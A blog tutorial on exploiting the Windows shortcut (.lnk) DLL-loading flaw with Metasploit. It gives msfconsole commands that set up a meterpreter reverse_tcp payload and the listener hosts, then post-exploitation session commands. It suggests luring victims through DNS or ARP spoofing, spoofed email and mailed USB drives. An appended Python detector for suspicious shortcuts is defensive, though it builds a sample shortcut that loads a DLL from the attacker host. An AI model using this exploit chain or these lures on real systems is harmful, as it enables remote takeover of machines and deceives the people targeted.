
A few days ago I posted a blog entry called Microsoft Validates Shortcut Vulnerability; that entry explains what the issue is and lists a few basic mitigation techniques. In short, the Windows Shell loads the DLL a shortcut (.lnk) names for its icon as soon as the shortcut is displayed, so a victim only has to view a folder or share containing the file, not double-click it. Below I will demonstrate how you can actively exploit this vulnerability using Metasploit.

Proof of concept testing: this test was performed using my BT4 VM, which was assigned IP address 192.168.126.135, and a Windows XP SP3 VM using IP address 192.168.126.134.

Step 1: Load Metasploit and get the latest update

On my BackTrack 4 VM I browsed to /pentest/exploits/framework3 and loaded msfconsole. Once it has loaded, run svn update so you get the latest and greatest; an out-of-date checkout will not have the new shortcut module.

Fig-1 SVN Update

Step 2: Select your exploit and payload

msf > use exploit/windows/browser/ms10_xxx_Windows_shell_lnk_execute
msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_Windows_shell_lnk_execute) > show options

The show options command lists the parameters that need to be set for the exploit to work. In our case that means the address and port the module listens on to serve the malicious shortcut (SRVHOST and SRVPORT) and the address and port the Meterpreter payload connects back to (LHOST and LPORT).

Fig-2 Choosing Exploit and Payload

Step 3: Fill in the required options and run the exploit

At this stage you simply fill in the correct IP address and listening port for the machine you are launching the attack from. If these are wrong the victim machine will not know where to connect back to, since I selected a reverse_tcp payload.

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set SRVHOST 192.168.126.135
msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set LHOST 192.168.126.135
msf exploit(ms10_xxx_Windows_shell_lnk_execute) > exploit

Fig-3 Fill-in LHOST and SRVHOST

Step 4: Get your victim to click the link or view the malicious file

At this stage you have to get a bit creative. A few things you can try:

- Use Ettercap to DNS-spoof the target network and redirect users to your malicious URL.
- Use a tool like the Social-Engineer Toolkit (SET) to send a spoofed email carrying your malicious link.
- ARP-spoof your host network, find a target who is using Facebook or one of the many other social networks, and send them the link that way.
- Try a more far-out social engineering attack: buy several USB drives, load the malicious shortcut and DLL onto them, and mail them to your target labelled "free USB drive".

Once you have your targets in sight, just sit back and wait. When an exploit fires you will see the following:

Fig-4 Successful Exploit

Verify that you have an active session with sessions -l, then connect to it with sessions -i # (where # is the session ID). From there you can run help to get a list of available commands. I simply ran ipconfig and getuid to show that I was on the Windows XP VM and that it had been successfully exploited.

Fig-5 Running Commands on exploited host

Fig-6 Popup box on exploited host

In the end there is not much the average user, who is not aware of the latest vulnerabilities, can do about this; it is up to us as IT professionals to stay in the loop so we can take the information back and make them aware. Lastly, the image in figure 6 should be a dead giveaway that something is up with your computer: if you did not connect to a share but suddenly see one pop up, it is time for a wipe and reinstall. Have fun until Microsoft patches this one, and remember to be responsible. All feedback is welcome.
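The pop-up in figure 6 is the only signal the post gives a defender, so as an added example (not code from the original post or from Metasploit) here is a small Python checker for the shortcut itself. It parses the .lnk ShellLinkHeader and LinkTargetIDList as laid out in the public MS-SHLLINK specification and flags the pattern this class of exploit relies on: a target ID list that walks into the Control Panel folder (CLSID 21EC2020-3AEA-1069-A2DD-08002B30309D) and names a .dll or .cpl module for the shell to load. The "Control Panel plus DLL name" heuristic is my assumption, not a published signature, and the two sample shortcuts are constructed inline with simplified item layouts so the script runs offline; the IP address in the sample is the attacker VM from this post.

```python
"""Heuristic .lnk checker for shortcuts that point the Control Panel at a DLL.

Header and IDList parsing follow MS-SHLLINK; the suspicious-pattern rule and the
two constructed sample files are assumptions made for this example.
"""
import struct
import uuid

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")   # LinkCLSID of every .lnk
HAS_LINK_TARGET_ID_LIST = 0x0001                                 # LinkFlags bit 0
CONTROL_PANEL_CLSID = uuid.UUID("21EC2020-3AEA-1069-A2DD-08002B30309D")
MY_COMPUTER_CLSID = uuid.UUID("20D04FE0-3AEA-1069-A2D8-08002B30309D")


def parse_lnk(data: bytes) -> dict:
    """Return {'flags': LinkFlags, 'items': [ItemID data, ...]} or raise ValueError."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short for a ShellLinkHeader")
    header_size, clsid = struct.unpack_from("<I16s", data, 0)
    if header_size != LNK_HEADER_SIZE or uuid.UUID(bytes_le=clsid) != LNK_CLSID:
        raise ValueError("not a Shell Link (bad HeaderSize or LinkCLSID)")
    (flags,) = struct.unpack_from("<I", data, 0x14)
    items = []
    if flags & HAS_LINK_TARGET_ID_LIST:
        # LinkTargetIDList: 2-byte IDListSize, then ItemIDs (2-byte size incl. the size
        # field) terminated by a 2-byte TerminalID of zero.
        (idlist_size,) = struct.unpack_from("<H", data, LNK_HEADER_SIZE)
        pos = LNK_HEADER_SIZE + 2
        end = pos + idlist_size
        if end > len(data):
            raise ValueError("IDListSize runs past end of file")
        while True:
            if pos + 2 > end:
                raise ValueError("IDList missing TerminalID")
            (item_size,) = struct.unpack_from("<H", data, pos)
            if item_size == 0:
                break
            if item_size < 2 or pos + item_size > end:
                raise ValueError("bad ItemIDSize")
            items.append(data[pos + 2:pos + item_size])
            pos += item_size
    return {"flags": flags, "items": items}


def mentions_module(item: bytes) -> bool:
    """True if the item carries a .dll/.cpl name in ASCII or UTF-16LE."""
    low = item.lower()   # bytes.lower() folds ASCII, which covers both encodings
    return any(ext.encode() in low or ext.encode("utf-16-le") in low
               for ext in (".dll", ".cpl"))


def is_suspicious_cpl_shortcut(data: bytes) -> bool:
    """Assumed heuristic: target walks into the Control Panel and names a module to load."""
    items = parse_lnk(data)["items"]
    in_control_panel = any(CONTROL_PANEL_CLSID.bytes_le in it for it in items)
    return in_control_panel and any(mentions_module(it) for it in items)


def build_lnk(items) -> bytes:
    """Assemble a minimal .lnk (header with HasLinkTargetIDList, then the IDList).

    Only used to construct the samples below; not a general shortcut writer.
    """
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID.bytes_le, HAS_LINK_TARGET_ID_LIST)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))
    idlist = b"".join(struct.pack("<H", len(it) + 2) + it for it in items) + b"\x00\x00"
    return header + struct.pack("<H", len(idlist)) + idlist


def root_item(clsid: uuid.UUID) -> bytes:
    """Root folder shell item: type 0x1F, a sort-index byte, then the folder CLSID."""
    return b"\x1f\x50" + clsid.bytes_le


# Constructed samples (item layouts simplified; attacker host is the post's BT4 VM).
CONSTRUCTED_MALICIOUS = build_lnk([
    root_item(MY_COMPUTER_CLSID),
    b"\x2e" + CONTROL_PANEL_CLSID.bytes_le,                        # Control Panel folder
    b"\x71\x00" + "\\\\192.168.126.135\\evil.dll".encode("utf-16-le") + b"\x00\x00",
])
CONSTRUCTED_BENIGN = build_lnk([
    root_item(MY_COMPUTER_CLSID),
    b"\x2f" + b"C:\\\x00",                                          # volume item
    b"\x32" + b"notes.txt\x00",                                     # file entry
])

if __name__ == "__main__":
    import sys
    for name, blob in (("constructed-malicious", CONSTRUCTED_MALICIOUS),
                       ("constructed-benign", CONSTRUCTED_BENIGN)):
        print(name, "SUSPICIOUS" if is_suspicious_cpl_shortcut(blob) else "ok")
    for path in sys.argv[1:]:          # any real .lnk files given on the command line
        with open(path, "rb") as fh:
            try:
                verdict = "SUSPICIOUS" if is_suspicious_cpl_shortcut(fh.read()) else "ok"
            except ValueError as exc:
                verdict = f"unparseable ({exc})"
            print(path, verdict)
```

Run it against the shortcuts found on a suspect share or USB stick (python lnkcheck.py *.lnk); because the check looks only at the target ID list, it works on a copy of the file and never asks the shell to render the icon, which is exactly the step that triggers the DLL load.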
